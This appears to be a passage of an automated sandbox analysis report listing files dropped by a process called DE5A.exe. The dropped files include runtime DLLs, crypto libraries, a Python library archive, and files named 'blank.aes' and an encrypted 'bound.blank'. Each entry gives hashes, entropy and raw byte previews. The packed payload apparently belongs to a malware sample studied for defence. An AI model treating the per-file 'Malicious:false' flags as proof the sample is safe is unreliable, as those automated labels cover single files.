                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):4.738587310329139
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:TWqhWXWEXCVWQ4mWPXTNyttuX01k9z3A2dGxr:TWqhWMKASR9zfYxr
                                                                                                                                                                                                                                MD5:F9235935DD3BA2AA66D3AA3412ACCFBF
                                                                                                                                                                                                                                SHA1:281E548B526411BCB3813EB98462F48FFAF4B3EB
                                                                                                                                                                                                                                SHA-256:2F6BD6C235E044755D5707BD560A6AFC0BA712437530F76D11079D67C0CF3200
                                                                                                                                                                                                                                SHA-512:AD0C0A7891FB8328F6F0CF1DDC97523A317D727C15D15498AFA53C07610210D2610DB4BC9BD25958D47ADC1AF829AD4D7CF8AABCAB3625C783177CCDB7714246
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......h*....`A............................................"............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):5.202163846121633
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:2pUEpnWlC0i5CBWqhWXLeWEXCVWQ4iW+/x6RMySX01k9z3Aza8Az629:2ptnWm5CBWqhWtWMR9zqaH629
                                                                                                                                                                                                                                MD5:5107487B726BDCC7B9F7E4C2FF7F907C
                                                                                                                                                                                                                                SHA1:EBC46221D3C81A409FAB9815C4215AD5DA62449C
                                                                                                                                                                                                                                SHA-256:94A86E28E829276974E01F8A15787FDE6ED699C8B9DC26F16A51765C86C3EADE
                                                                                                                                                                                                                                SHA-512:A0009B80AD6A928580F2B476C1BDF4352B0611BB3A180418F2A42CFA7A03B9F0575ED75EC855D30B26E0CCA96A6DA8AFFB54862B6B9AFF33710D2F3129283FAA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......M4....`A.........................................................0...............0..h&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):4.866983142029453
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:0vh8Y17aFBRsWqhW9AWEXCVWQ4mWCB4Lrp0KBQfX01k9z3ALkg5Z7:SL5WqhW9boRxB+R9z2kM7
                                                                                                                                                                                                                                MD5:D5D77669BD8D382EC474BE0608AFD03F
                                                                                                                                                                                                                                SHA1:1558F5A0F5FACC79D3957FF1E72A608766E11A64
                                                                                                                                                                                                                                SHA-256:8DD9218998B4C4C9E8D8B0F8B9611D49419B3C80DAA2F437CBF15BCFD4C0B3B8
                                                                                                                                                                                                                                SHA-512:8DEFA71772105FD9128A669F6FF19B6FE47745A0305BEB9A8CADB672ED087077F7538CD56E39329F7DAA37797A96469EAE7CD5E4CCA57C9A183B35BDC44182F3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@............`A.........................................................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.828044267819929
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:dUnWqhWRWJWadJCsVWQ4mW+2PyttuX01k9z3A23y:cWqhWQCsHSR9zf3y
                                                                                                                                                                                                                                MD5:650435E39D38160ABC3973514D6C6640
                                                                                                                                                                                                                                SHA1:9A5591C29E4D91EAA0F12AD603AF05BB49708A2D
                                                                                                                                                                                                                                SHA-256:551A34C400522957063A2D71FA5ABA1CD78CC4F61F0ACE1CD42CC72118C500C0
                                                                                                                                                                                                                                SHA-512:7B4A8F86D583562956593D27B7ECB695CB24AB7192A94361F994FADBA7A488375217755E7ED5071DE1D0960F60F255AA305E9DD477C38B7BB70AC545082C9D5E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@.......-....`A............................................e............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):30328
                                                                                                                                                                                                                                Entropy (8bit):5.14173409150951
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:r7yaFM4Oe59Ckb1hgmLVWqhW2CsWNbZR9zQoekS:/FMq59Bb1jnoFT9zGp
                                                                                                                                                                                                                                MD5:B8F0210C47847FC6EC9FBE2A1AD4DEBB
                                                                                                                                                                                                                                SHA1:E99D833AE730BE1FEDC826BF1569C26F30DA0D17
                                                                                                                                                                                                                                SHA-256:1C4A70A73096B64B536BE8132ED402BCFB182C01B8A451BFF452EFE36DDF76E7
                                                                                                                                                                                                                                SHA-512:992D790E18AC7AE33958F53D458D15BFF522A3C11A6BD7EE2F784AC16399DE8B9F0A7EE896D9F2C96D1E2C8829B2F35FF11FC5D8D1B14C77E22D859A1387797C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P..x&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):4.883012715268179
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:5eXrqjd7ZWqhW3WEXCVWQ4mW3Ql1Lrp0KBQfX01k9z3ALkjY/12:54rgWqhWsP1RxB+R9z2kjY/Y
                                                                                                                                                                                                                                MD5:272C0F80FD132E434CDCDD4E184BB1D8
                                                                                                                                                                                                                                SHA1:5BC8B7260E690B4D4039FE27B48B2CECEC39652F
                                                                                                                                                                                                                                SHA-256:BD943767F3E0568E19FB52522217C22B6627B66A3B71CD38DD6653B50662F39D
                                                                                                                                                                                                                                SHA-512:94892A934A92EF1630FBFEA956D1FE3A3BFE687DEC31092828960968CB321C4AB3AF3CAF191D4E28C8CA6B8927FBC1EC5D17D5C8A962C848F4373602EC982CD4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......N.....`A............................................x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26208
                                                                                                                                                                                                                                Entropy (8bit):5.023753175006074
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:4mGqX8mPrpJhhf4AN5/KiFWqhWyzWEXCVWQ4OW4034hHssDX01k9z3AaYX2cWo:4ysyr77WqhWyI0oFDR9z9YH9
                                                                                                                                                                                                                                MD5:20C0AFA78836B3F0B692C22F12BDA70A
                                                                                                                                                                                                                                SHA1:60BB74615A71BD6B489C500E6E69722F357D283E
                                                                                                                                                                                                                                SHA-256:962D725D089F140482EE9A8FF57F440A513387DD03FDC06B3A28562C8090C0BC
                                                                                                                                                                                                                                SHA-512:65F0E60136AB358661E5156B8ECD135182C8AAEFD3EC320ABDF9CFC8AEAB7B68581890E0BBC56BAD858B83D47B7A0143FA791195101DC3E2D78956F591641D16
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P......D!....`A............................................4............@...............@..`&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26232
                                                                                                                                                                                                                                Entropy (8bit):5.289041983400337
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:UuV2OlkuWYFxEpahfWqhWNWJWadJCsVWQ4mWeX9UfKUSIX01k9z3AEXzGd5S:dV2oFVhfWqhWMCstE2IR9z5Sd5S
                                                                                                                                                                                                                                MD5:96498DC4C2C879055A7AFF2A1CC2451E
                                                                                                                                                                                                                                SHA1:FECBC0F854B1ADF49EF07BEACAD3CEC9358B4FB2
                                                                                                                                                                                                                                SHA-256:273817A137EE049CBD8E51DC0BB1C7987DF7E3BF4968940EE35376F87EF2EF8D
                                                                                                                                                                                                                                SHA-512:4E0B2EF0EFE81A8289A447EB48898992692FEEE4739CEB9D87F5598E449E0059B4E6F4EB19794B9DCDCE78C05C8871264797C14E4754FD73280F37EC3EA3C304
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P............`A............................................a............@...............@..x&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26232
                                                                                                                                                                                                                                Entropy (8bit):5.284932479906984
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:tCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWqhWbQCsMSR9zful:tCV5yguNvZ5VQgx3SbwA71IkFGqHe9zI
                                                                                                                                                                                                                                MD5:115E8275EB570B02E72C0C8A156970B3
                                                                                                                                                                                                                                SHA1:C305868A014D8D7BBEF9ABBB1C49A70E8511D5A6
                                                                                                                                                                                                                                SHA-256:415025DCE5A086DBFFC4CF322E8EAD55CB45F6D946801F6F5193DF044DB2F004
                                                                                                                                                                                                                                SHA-512:B97EF7C5203A0105386E4949445350D8FF1C83BDEAEE71CCF8DC22F7F6D4F113CB0A9BE136717895C36EE8455778549F629BF8D8364109185C0BF28F3CB2B2CA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P......\.....`A.........................................................@...............@..x&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22120
                                                                                                                                                                                                                                Entropy (8bit):5.253102285412285
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:mt3hwDGWqhWrWEXCVWQ4mWn+deyttuX01k9z3A23x:AWqhWgPSR9zfh
                                                                                                                                                                                                                                MD5:001E60F6BBF255A60A5EA542E6339706
                                                                                                                                                                                                                                SHA1:F9172EC37921432D5031758D0C644FE78CDB25FA
                                                                                                                                                                                                                                SHA-256:82FBA9BC21F77309A649EDC8E6FC1900F37E3FFCB45CD61E65E23840C505B945
                                                                                                                                                                                                                                SHA-512:B1A6DC5A34968FBDC8147D8403ADF8B800A06771CC9F15613F5CE874C29259A156BAB875AAE4CAAEC2117817CE79682A268AA6E037546AECA664CD4EEA60ADBF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@.......&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.810971823417463
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:p/fHQduDWqhWJWJWadJCsVWQ4mWxrnyttuX01k9z3A2Yv6WT:p/ftWqhWoCsmySR9zfYvvT
                                                                                                                                                                                                                                MD5:A0776B3A28F7246B4A24FF1B2867BDBF
                                                                                                                                                                                                                                SHA1:383C9A6AFDA7C1E855E25055AAD00E92F9D6AAFF
                                                                                                                                                                                                                                SHA-256:2E554D9BF872A64D2CD0F0EB9D5A06DEA78548BC0C7A6F76E0A0C8C069F3C0A9
                                                                                                                                                                                                                                SHA-512:7C9F0F8E53B363EF5B2E56EEC95E7B78EC50E9308F34974A287784A1C69C9106F49EA2D9CA037F0A7B3C57620FCBB1C7C372F207C68167DF85797AFFC3D7F3BA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......^.....`A............................................^............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1333651
                                                                                                                                                                                                                                Entropy (8bit):5.5868779115750264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:uttcY+bS4OmE1jc+fYNXPh26UZWAzDX7jOIqL3CjHgopRdmoPFHz1dcfsFvaYcIe:uttcY+NHSPD/e2cqRdmoPxzQIaYcIe
                                                                                                                                                                                                                                MD5:8DAD91ADD129DCA41DD17A332A64D593
                                                                                                                                                                                                                                SHA1:70A4EC5A17ED63CAF2407BD76DC116ACA7765C0D
                                                                                                                                                                                                                                SHA-256:8DE4F013BFECB9431AABAA97BB084FB7DE127B365B9478D6F7610959BF0D2783
                                                                                                                                                                                                                                SHA-512:2163414BC01FC30D47D1DE763A8332AFE96EA7B296665B1A0840D5197B7E56F4963938E69DE35CD2BF89158E5E2240A1650D00D86634AC2A5E2AD825455A2D50
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\blank.aes

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):110984
                                                                                                                                                                                                                                Entropy (8bit):7.696752308710476
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:n9JWx0ZlZV1wIhkmsW3v5rqAyvHMiUqu6fLmqsWb0ESs1lqAkZKKfvPykX5DlhLH:DH19hdsWftxPq7TmPFTXZ/fydp0
                                                                                                                                                                                                                                MD5:0E72CD64DE3B2DCAF5E8C865210CF79B
                                                                                                                                                                                                                                SHA1:C74631D639E609A71A05BC00AE57C9DCCC2E388B
                                                                                                                                                                                                                                SHA-256:039BE3916BE3310D9967AEEDF24C354E881ECD4213A9E64871801A12FF606B26
                                                                                                                                                                                                                                SHA-512:DDCF6E785F2067A04D6F3B5991EDFF54C4E7B48B9A8F186DD68EA0DF261E70846CD0E96DFE07357A6005E9819FE760E8BDB4143798E58FCABCD5F298A2564467
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PK........8..X.\..............stub-o.pyc..........8f.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\bound.blank

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):271628
                                                                                                                                                                                                                                Entropy (8bit):7.9960131360560105
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:beJP6qQZDyuYii3eKNdmwB9eSCOK55UMxM9hQrF08rObP:2q9yoi3eKNdlP9Cr5PxIurw
                                                                                                                                                                                                                                MD5:A916B1FEE5C681D033175305BB399B74
                                                                                                                                                                                                                                SHA1:C3A17B54D5CDAF56536CEEBFD58701EE2C574E2F
                                                                                                                                                                                                                                SHA-256:067B93B38E89D000BFECC2612066F94434B3A850B0B9B22F4C0E9C62211B056E
                                                                                                                                                                                                                                SHA-512:4440F974011650E8DB814E269D7D02206D14BF66317A408A799564FBB83F3080AA7B43624EE3FAC0842AE72757209D9F21684CB94CAD5A021968CEFBD0B6B74B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.@z......._pA...$h.H.....R..C)...i....38..Z~.4.w........|;.pq.....)O..G..)a...K......I8L.eN...LOY...p"m?.x.>....E.....&.I..N...p.+...1..r..C0d...... .rO.$...^......,...:..r..L..*.I...odWs.;$...c..b..........*O`..?<.3.#.O..v.OA....*.`..c...L......-...n....zB............)U...,y.......+.J]0..'..p...8AN$...1>'.....w.J...r..x'^..M....B.D./P.t.U.M.(.|........9d.....I.(."P....N"../.......%C...o..I.x....i..*...;(.E.._..7..Z.-..#.._BR~.]Bi.%...~r.5.....*.B3.(..0...@l$Vc...Eh:..i=?...w.*..oxlY.n..{..U.@pB..+ i.Jd.@L... .H.....>.1mx'^R'8.c...m....s.:...WaWT6\.....z.q........N....~H.3..o..O.*....\..T.<L.X..xy..i...;i..FH.._....u1....*.j.U.B.xP4.F..d.`.DUuA'.|:*#,...<.d+.]...R.X.E.h...d.!.A....e.^......#.h..<.F.Z._..6.....E.1..cg...<.......G1L. ...@}.@....."..G..X..U..k.(...=|5.W.^.....t....*x.n..g"y...b+.DW.\[..........X..X..Q..#.&G.x..T...>.F....../G...J...Z..#.x7.<s.x'L.t..........&...#j..2.,....!g.9.C.....x4........^.-...4!i..7..r.M..^...@..._..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\libcrypto-3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1635096
                                                                                                                                                                                                                                Entropy (8bit):7.95287803315892
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:z6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:z6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
                                                                                                                                                                                                                                MD5:7F1B899D2015164AB951D04EBB91E9AC
                                                                                                                                                                                                                                SHA1:1223986C8A1CBB57EF1725175986E15018CC9EAB
                                                                                                                                                                                                                                SHA-256:41201D2F29CF3BC16BF32C8CECF3B89E82FEC3E5572EB38A578AE0FB0C5A2986
                                                                                                                                                                                                                                SHA-512:CA227B6F998CACCA3EB6A8F18D63F8F18633AB4B8464FB8B47CAA010687A64516181AD0701C794D6BFE3F153662EA94779B4F70A5A5A94BB3066D8A011B4310D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\libffi-8.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):29968
                                                                                                                                                                                                                                Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI43482\libssl-3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):228120
                                                                                                                                                                                                                                Entropy (8bit):7.928688904391487
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:Gmlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:l+t6Ce6XKtSHYomk2
                                                                                                                                                                                                                                MD5:264BE59FF04E5DCD1D020F16AAB3C8CB
                                                                                                                                                                                                                                SHA1:2D7E186C688B34FDB4C85A3FCE0BEFF39B15D50E
                                                                                                                                                                                                                                SHA-256:358B59DA9580E7102ADFC1BE9400ACEA18BC49474DB26F2F8BACB4B8839CE49D
                                                                                                                                                                                                                                SHA-512:9ABB96549724AFFB2E69E5CB2C834ECEA3F882F2F7392F2F8811B8B0DB57C5340AB21BE60F1798C7AB05F93692EB0AEAB077CAF7E9B7BB278AD374FF3C52D248
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
